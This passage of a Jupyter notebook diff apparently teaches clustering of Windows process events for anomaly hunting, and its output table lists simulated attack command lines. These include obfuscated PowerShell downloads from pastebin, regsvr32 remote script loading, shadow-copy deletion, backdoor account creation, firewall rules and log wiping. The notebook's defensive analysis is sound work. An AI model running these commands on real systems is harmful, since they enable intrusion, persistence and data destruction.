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"
+     },
+     "metadata": {}
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "markdown",
+   "source": [
+    "The top graph shows that, for a given process, some have a wide variability in their command line content while the majority have little or none. Looking at a couple of examples - like cmd.exe, powershell.exe, reg.exe, net.exe - we can recognize several common command line tools.\n",
+    "\n",
+    "The second graph shows processes by full process path content. We wouldn't normally expect to see variation here - as is the cast with most. There is also quite a lot of variance in the score making it a useful proxy feature for unique path name (this means that proc1.exe and proc2.exe that have the same commandline score won't get collapsed into the same cluster).\n",
+    "\n",
+    "Any process with a spread of values here means that we are seeing the same process name (but not necessarily the same file) is being run from different locations."
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 4,
+   "source": [
+    "display(clus_events.sort_values('ClusterSize')[['TimeGenerated', 'LastEventTime',\n",
+    "                                                'NewProcessName', 'CommandLine',\n",
+    "                                                'ClusterSize', 'commandlineTokensFull',\n",
+    "                                                'pathScore', 'isSystemSession']])"
+   ],
+   "outputs": [
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/plain": [
+       "              TimeGenerated           LastEventTime  \\\n",
+       "46  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "356 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "301 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "256 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "219 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "198 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "195 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "176 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "171 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "163 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "162 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "139 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "134 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "133 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "130 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "110 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "292 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "106 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "57  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "59  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "61  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "64  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "65  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "74  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "62  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "78  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "82  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "83  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "86  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "87  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "94  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "75  2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "108 2019-01-15 04:23:43.103 2019-01-15 05:15:20.623   \n",
+       "63  2019-01-15 05:15:16.850 2019-01-15 05:15:17.580   \n",
+       "211 2019-01-15 05:15:19.223 2019-01-15 05:15:19.337   \n",
+       "190 2019-01-15 05:15:18.287 2019-01-15 05:15:18.967   \n",
+       "149 2019-01-15 05:15:15.520 2019-01-15 05:15:15.923   \n",
+       "104 2019-01-15 05:15:12.977 2019-01-15 05:15:19.583   \n",
+       "95  2019-01-15 05:15:10.817 2019-01-15 05:15:14.453   \n",
+       "77  2019-01-15 05:15:03.247 2019-01-15 05:15:11.260   \n",
+       "270 2019-01-15 04:28:01.517 2019-01-15 04:28:33.090   \n",
+       "254 2019-01-15 04:42:25.437 2019-01-15 05:12:25.403   \n",
+       "60  2019-01-15 05:15:15.827 2019-01-15 05:15:16.720   \n",
+       "142 2019-01-15 05:15:14.770 2019-01-15 05:15:15.283   \n",
+       "125 2019-01-15 05:15:12.123 2019-01-15 05:15:17.650   \n",
+       "56  2019-01-15 05:15:16.117 2019-01-15 05:15:18.403   \n",
+       "85  2019-01-15 05:15:03.830 2019-01-15 05:15:19.447   \n",
+       "49  2019-01-15 05:15:16.353 2019-01-15 05:15:16.520   \n",
+       "69  2019-01-15 05:15:03.390 2019-01-15 05:15:17.137   \n",
+       "193 2019-01-15 05:02:28.260 2019-01-15 05:15:19.537   \n",
+       "169 2019-01-15 05:15:14.493 2019-01-15 05:15:19.060   \n",
+       "122 2019-01-15 05:15:11.947 2019-01-15 05:15:19.403   \n",
+       "68  2019-01-15 05:15:12.513 2019-01-15 05:15:18.630   \n",
+       "80  2019-01-15 05:15:03.410 2019-01-15 05:15:18.670   \n",
+       "67  2019-01-15 05:15:05.193 2019-01-15 05:15:19.617   \n",
+       "48  2019-01-15 05:15:10.667 2019-01-15 05:15:18.917   \n",
+       "47  2019-01-15 05:15:03.057 2019-01-15 05:15:18.820   \n",
+       "96  2019-01-15 05:15:11.190 2019-01-15 05:15:18.867   \n",
+       "0   2019-01-15 04:16:24.007 2019-01-15 05:24:24.010   \n",
+       "2   2019-01-15 04:16:25.550 2019-01-15 05:24:25.807   \n",
+       "1   2019-01-15 04:16:24.027 2019-01-15 05:24:24.023   \n",
+       "3   2019-01-15 04:15:26.000 2019-01-15 05:24:26.010   \n",
+       "\n",
+       "                                                                                          NewProcessName  \\\n",
+       "46                                                                        C:\\Diagnostics\\UserTmp\\reg.exe   \n",
+       "356      C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Resources\\222\\pmfexe.exe   \n",
+       "301                                                                          C:\\Windows\\System32\\cmd.exe   \n",
+       "256                      C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-01-14_202614\\CollectGuestLogs.exe   \n",
+       "219                                                                       C:\\Windows\\System32\\wermgr.exe   \n",
+       "198                                                                       C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "195                                                                       C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "176                                                                   C:\\Diagnostics\\UserTmp\\wuauclt.exe   \n",
+       "171                                                                      C:\\Windows\\System32\\svchost.exe   \n",
+       "163                                                                     C:\\Diagnostics\\UserTmp\\netsh.exe   \n",
+       "162                                                                       C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "139                                                                C:\\Diagnostics\\UserTmp\\powershell.exe   \n",
+       "134                                                                C:\\Windows\\System32\\wbem\\WmiPrvSE.exe   \n",
+       "133                                                                       C:\\Windows\\System32\\sppsvc.exe   \n",
+       "130                                                                C:\\Diagnostics\\UserTmp\\powershell.exe   \n",
+       "110                                                                       C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "292                                                                    C:\\Windows\\System32\\taskhostw.exe   \n",
+       "106                                                                C:\\Diagnostics\\UserTmp\\powershell.exe   \n",
+       "57                                                                   C:\\Diagnostics\\UserTmp\\tsetup.1.exe   \n",
+       "59                                                                      C:\\Diagnostics\\UserTmp\\netsh.exe   \n",
+       "61                                                                        C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "64                                                                        C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "65                                                                        C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "74                                                                       C:\\Windows\\System32\\dllhost.exe   \n",
+       "62                                                                        C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "78                                                                           C:\\Windows\\System32\\cmd.exe   \n",
+       "82                                                                          C:\\Windows\\System32\\net1.exe   \n",
+       "83                                                                          C:\\Windows\\System32\\Dism.exe   \n",
+       "86                                     C:\\Windows\\Temp\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\DismHost.exe   \n",
+       "87                                                             C:\\Windows\\servicing\\TrustedInstaller.exe   \n",
+       "94                                                                   C:\\Diagnostics\\UserTmp\\regsvr32.exe   \n",
+       "75                                                                           C:\\Windows\\System32\\cmd.exe   \n",
+       "108                                                                C:\\Diagnostics\\UserTmp\\powershell.exe   \n",
+       "63                                                                        C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "211                                                                        C:\\Diagnostics\\UserTmp\\hd.exe   \n",
+       "190                                                                     C:\\Diagnostics\\UserTmp\\lsass.exe   \n",
+       "149                                                                          C:\\Windows\\System32\\net.exe   \n",
+       "104                                                                C:\\Diagnostics\\UserTmp\\powershell.exe   \n",
+       "95                                                                       C:\\Windows\\System32\\svchost.exe   \n",
+       "77                                                                           C:\\Windows\\System32\\cmd.exe   \n",
+       "270                                                C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe   \n",
+       "254                                                              C:\\Windows\\System32\\MusNotification.exe   \n",
+       "60                                                                        C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "142                                                                       C:\\Windows\\System32\\whoami.exe   \n",
+       "125                                                                       C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "56                                                                        C:\\Diagnostics\\UserTmp\\reg.exe   \n",
+       "85                                                                           C:\\Windows\\System32\\net.exe   \n",
+       "49                                                                      C:\\Diagnostics\\UserTmp\\42424.exe   \n",
+       "69                                                                      C:\\Windows\\System32\\vssadmin.exe   \n",
+       "193                                                                       C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "169                                                                   C:\\Diagnostics\\UserTmp\\svchost.exe   \n",
+       "122                                                                   C:\\Diagnostics\\UserTmp\\implant.exe   \n",
+       "68                                                        C:\\Diagnostics\\UserTmp\\doubleextension.pdf.exe   \n",
+       "80                                                                          C:\\Windows\\System32\\net1.exe   \n",
+       "67                                                     C:\\Diagnostics\\UserTmp\\sdopfjiowtbkjfnbeioruj.exe   \n",
+       "48                                                                   C:\\Diagnostics\\UserTmp\\rundll32.exe   \n",
+       "47                                                                        C:\\Diagnostics\\UserTmp\\cmd.exe   \n",
+       "96                                                                     C:\\Windows\\System32\\win32calc.exe   \n",
+       "0    C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\De...   \n",
+       "2                                                                  C:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe   \n",
+       "1                                                                        C:\\Windows\\System32\\conhost.exe   \n",
+       "3                                                                        C:\\Windows\\System32\\cscript.exe   \n",
+       "\n",
+       "                                                                                             CommandLine  \\\n",
+       "46                                    .\\reg  not /domain:everything that /sid:shines is /krbtgt:golden !   \n",
+       "356  \"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Resources\\222\\pmfexe.exe...   \n",
+       "301                                                                                                \"cmd\"   \n",
+       "256  \"CollectGuestLogs.exe\" -Mode:ga -FileName:C:\\WindowsAzure\\CollectGuestLogsTemp\\710dc858-9c96-4df...   \n",
+       "219                                                               C:\\Windows\\system32\\wermgr.exe -upload   \n",
+       "198                                                     cmd  /c echo \" SYSTEMINFO && SYSTEMINFO && DEL \"   \n",
+       "195  cmd  /c \"cd /d \"C:\\inetpub\\wwwroot\"&c:\\windows\\system32\\inetsrv\\appcmd set config \"Default Web S...   \n",
+       "176                                      .\\wuauclt.exe  /C \"c:\\windows\\softwaredistribution\\cscript.exe\"   \n",
+       "171                                                        c:\\Windows\\System32\\svchost.exe  -k malicious   \n",
+       "163  .\\netsh  advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\users\\Bob\\appdata\\Ro...   \n",
+       "162  cmd  /c C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\".\\powershell.e...   \n",
+       "139  .\\powershell  -command \"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'...   \n",
+       "134                                                     C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding   \n",
+       "133                                                                       C:\\Windows\\system32\\sppsvc.exe   \n",
+       "130  .\\powershell  -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ...   \n",
+       "110  cmd  /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t...   \n",
+       "292                                                                                 taskhostw.exe SYSTEM   \n",
+       "106  .\\powershell.exe  -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"...   \n",
+       "57   c:\\Diagnostics\\UserTmp\\tsetup.1.exe  C:\\Users\\MSTICAdmin\\AppData\\Local\\Temp\\2\\is-01DD7.tmp\\tsetu...   \n",
+       "59    .\\netsh.exe  \"in (*.exe) do start # artificial commandline solely for purposes of triggering test\"   \n",
+       "61   .\\cmd  /c \"cd /d \"C:\\inetpub\\wwwroot\"&powershell Enable-WSManCredSSP =2013Role Server -force&ech...   \n",
+       "64   .\\cmd  /c \"cd /d \"C:\\inetpub\\wwwroot\"&c:\\windows\\system32\\inetsrv\\appcmd set config \"Default Web...   \n",
+       "65   .\\cmd  /c \"cd /d \"C:\\inetpub\\wwwroot\"&del C:\\inetpub\\logs\\logFiles\\W3SVC1\\*.log /q&echo [S]&cd&e...   \n",
+       "74                     C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}   \n",
+       "62   .\\cmd  /c \"cd /d \"C:\\inetpub\\wwwroot\"&powershell winrm set winrm/config/service/Auth @{Kerberos=...   \n",
+       "78   cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft...   \n",
+       "82                              C:\\Windows\\system32\\net1  share TestShare=c:\\testshare /Grant:Users,Read   \n",
+       "83                                    dism /online /enable-feature /featurename:File-Services /NoRestart   \n",
+       "86   C:\\Windows\\TEMP\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\dismhost.exe {D57BA872-53C0-424D-80AE-E4911...   \n",
+       "87                                                             C:\\Windows\\servicing\\TrustedInstaller.exe   \n",
+       "94                                            .\\regsvr32   /s /n /u /i:http://server/file.sct scrobj.dll   \n",
+       "75                        cmd.exe /c c:\\Diagnostics\\WindowsSimulateDetections.bat c:\\Diagnostics\\UserTmp   \n",
+       "108  .\\powershell  -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\"{2}{0}{1}\"-f ':/','/past...   \n",
+       "63   .\\cmd  /c \"cd /d \"C:\\ProgramData\"&copy \\\\[REDACTED]\\c$\\users\\[REDACTED]\\Documents\\\"Password Chan...   \n",
+       "211                                                                                      hd.exe  -pslist   \n",
+       "190                                        .\\lsass.exe  /C \"c:\\windows\\softwaredistribution\\cscript.exe\"   \n",
+       "149                                                                   net  group \"Domain Admins\" /domain   \n",
+       "104  .\\powershell  -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go...   \n",
+       "95                                                             C:\\Windows\\system32\\svchost.exe -k wsappx   \n",
+       "77                cmd  /c echo Any questions about the commands executed here then please contact one of   \n",
+       "270                 \"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /ua /installsource scheduler   \n",
+       "254                                                      C:\\Windows\\system32\\MusNotification.exe Display   \n",
+       "60   .\\cmd  /c \"cd /d \"C:\\inetpub\\wwwroot\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&ec...   \n",
+       "142                                                                                               whoami   \n",
+       "125      cmd  /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\"    \n",
+       "56                                     .\\reg.exe  add \\hkcu\\software\\microsoft\\some\\key\\Run /v abadvalue   \n",
+       "85                               net  use q: \\\\MSTICAlertsWin1\\TestShare Bob_testing /User:adm1nistrator   \n",
+       "49                                                                                             42424.exe   \n",
+       "69                                                                  vssadmin  delete shadows /all /quiet   \n",
+       "193                                           cmd  /c \"powershell wscript.shell used to download a .gif\"   \n",
+       "169                                                                  c:\\Diagnostics\\UserTmp\\svchost.exe    \n",
+       "122                                                                                    implant.exe  k111   \n",
+       "68                                                       c:\\Diagnostics\\UserTmp\\doubleextension.pdf.exe    \n",
+       "80                                         C:\\Windows\\system32\\net1  user adm1nistrator Bob_testing /add   \n",
+       "67                                                    c:\\Diagnostics\\UserTmp\\sdopfjiowtbkjfnbeioruj.exe    \n",
+       "48                                                                              .\\rundll32  /C 42424.exe   \n",
+       "47                                                                    cmd  /c \"systeminfo && systeminfo\"   \n",
+       "96                                                                  \"C:\\Windows\\System32\\win32calc.exe\"    \n",
+       "0    \"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\D...   \n",
+       "2                                              C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding   \n",
+       "1                                                \\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1   \n",
+       "3                              \"C:\\Windows\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\"   \n",
+       "\n",
+       "     ClusterSize  commandlineTokensFull  pathScore  isSystemSession  \n",
+       "46             1                     16       2951            False  \n",
+       "356            1                     27       9108             True  \n",
+       "301            1                      2       2570             True  \n",
+       "256            1                     18       6421             True  \n",
+       "219            1                      7       2922             True  \n",
+       "198            1                     17       2941            False  \n",
+       "195            1                     39       2941            False  \n",
+       "176            1                     14       3406            False  \n",
+       "171            1                      9       3040            False  \n",
+       "163            1                     18       3179            False  \n",
+       "162            1                     56       2941            False  \n",
+       "139            1                     36       3726            False  \n",
+       "134            1                      8       3546             True  \n",
+       "133            1                      5       2933             True  \n",
+       "130            1                     25       3726            False  \n",
+       "110            1                     46       2941            False  \n",
+       "292            1                      2       3262             True  \n",
+       "106            1                     68       3726            False  \n",
+       "57             1                     40       3405            False  \n",
+       "59             1                     22       3179            False  \n",
+       "61             1                     28       2941            False  \n",
+       "64             1                     41       2941            False  \n",
+       "65             1                     32       2941            False  \n",
+       "74             1                     12       3024             True  \n",
+       "62             1                     31       2941            False  \n",
+       "78             1                     21       2570            False  \n",
+       "82             1                     13       2638            False  \n",
+       "83             1                     11       2659             True  \n",
+       "86             1                     15       4900             True  \n",
+       "87             1                      5       4175             True  \n",
+       "94             1                     20       3399            False  \n",
+       "75             1                     12       2570             True  \n",
+       "108            1                     53       3726            False  \n",
+       "63             2                     29       2941            False  \n",
+       "211            2                      4       2837            False  \n",
+       "190            2                     14       3183            False  \n",
+       "149            2                      8       2589            False  \n",
+       "104            2                     24       3726            False  \n",
+       "95             2                      8       3040             True  \n",
+       "77             2                     16       2570            False  \n",
+       "270            2                     17       4895             True  \n",
+       "254            2                      6       3826             True  \n",
+       "60             3                     25       2941            False  \n",
+       "142            3                      0       2907            False  \n",
+       "125            3                     21       2941            False  \n",
+       "56             3                     15       2951            False  \n",
+       "85             3                     12       2589            False  \n",
+       "49             3                      1       2889            False  \n",
+       "69             4                      7       3131            False  \n",
+       "193            5                     14       2941            False  \n",
+       "169            6                      6       3411            False  \n",
+       "122            7                      3       3390            False  \n",
+       "68             7                      7       4617            False  \n",
+       "80             7                     10       2638            False  \n",
+       "67             9                      6       5005            False  \n",
+       "48            15                      7       3391            False  \n",
+       "47            23                     10       2941            False  \n",
+       "96            28                      8       3100            False  \n",
+       "0             35                     52      12225             True  \n",
+       "2             38                     10       3478             True  \n",
+       "1             39                     10       3028             True  \n",
+       "3             71                     13       3022             True  "
+      ],
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "      <th>LastEventTime</th>\n",
+       "      <th>NewProcessName</th>\n",
+       "      <th>CommandLine</th>\n",
+       "      <th>ClusterSize</th>\n",
+       "      <th>commandlineTokensFull</th>\n",
+       "      <th>pathScore</th>\n",
+       "      <th>isSystemSession</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>46</th>\n",
+       "      <td>2019-01-15 04:23:43.103</td>\n",
+       "      <td>2019-01-15 05:15:20.623</td>\n",
